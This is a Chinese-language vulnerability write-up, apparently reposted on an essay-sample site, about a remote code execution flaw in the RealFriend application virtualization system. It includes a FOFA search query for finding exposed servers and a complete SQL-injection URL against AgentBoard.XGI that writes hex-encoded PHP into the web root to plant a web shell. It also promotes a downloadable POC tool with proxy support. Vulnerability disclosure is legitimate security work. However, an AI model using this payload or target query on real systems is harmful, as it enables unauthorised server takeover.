1200字范文,内容丰富有趣,写作的好帮手!
1200字范文 > 瑞友天翼应用虚拟化系统存在远程代码执行漏洞

瑞友天翼应用虚拟化系统存在远程代码执行漏洞

时间:2023-04-07 05:14:47

相关推荐

瑞友天翼应用虚拟化系统存在远程代码执行漏洞

文章目录

瑞友天翼应用虚拟化系统存在远程代码执行漏洞1. 瑞友天翼应用虚拟化系统简介2.漏洞描述3.影响版本4.fofa 查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾

瑞友天翼应用虚拟化系统存在远程代码执行漏洞

1. 瑞友天翼应用虚拟化系统简介

微信公众号搜索:南风漏洞复现文库

该文章 南风漏洞复现文库 公众号首发

瑞友天翼应用虚拟化系统是具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。

2.漏洞描述

瑞友天翼应用虚拟化系统存在远程代码执行漏洞,攻击者可以利用此漏洞获WEB主机权限。

3.影响版本

4.fofa 查询语句

title=“瑞友天翼-应用虚拟化系统”

5.漏洞复现

先把去以下网址把你的需要写入的php代码转换成16进制

例如<?php phpinfo();?> 转换成16进制是

<?php phpinfo();?> 转换成16进制 3c3f70687020706870696e666f28293b3f3e

我需要把这个文件保存在根目录的 testtest.php文件内。

拼接你的文件名和php代码16进制值,得到如下地址,然后访问。

拼接得到如下地址

http://127.0.0.1/AgentBoard.XGI?user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2Ftesttest.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020706870696e666f28293b3f3e--%20-&cmd=UserLogin

访问以上链接后,webshell地址就保存在根目录下

http://127.0.0.1/testtest.php

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现20 即可获得该POC工具下载地址:

本次的poc加入了代理功能,方便各位师傅调试。

7.整改意见

厂商尚未提供漏洞修补方案,请关注厂商主页及时更新:

8.往期回顾

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。